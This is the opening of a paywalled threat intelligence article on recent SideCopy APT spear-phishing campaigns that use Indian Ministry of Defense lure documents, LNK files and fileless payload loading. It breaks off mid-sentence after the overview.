Member-only story
Analysis of SideCopy Group’s Recent Attacks Using Indian Ministry of Defense Documents as Lures
Background
In September 2020, Quick Heal revealed an espionage operation against the Indian Defense forces and armed forces personnel and named it Operation SideCopy. The operation began in early 2019, and its attackers mainly used the TTPs of the Sidewinder APT group to carry out attacks, hence it was named Operation SideCopy.
In July 2021, Cisco Talos researchers tracked the attackers behind Operation SideCopy as an independent group and named it the SideCopy APT group. The report disclosed that the group used various attack weapons, including CetaRAT, ReverseRAT, MargulasRAT, AllakoreRAT, and several C# plugins [1].
Recently, during our continuous tracking of the SideCopy group, we discovered some interesting samples.
Overview
In this attack activity, SideCopy’s infection chain is relatively consistent with the previous attack activity. It uses a malicious LNK file as the entry point, followed by a complex infection chain involving multiple layers of file nesting to pass the final payload. Based on analysis, some characteristics of this attack activity are as follows:
- Spear-phishing emails, with LNK files in compressed packages as the attack entry point;
- Loading and executing subsequent payloads in memory without files;
- The final payload is an improved…
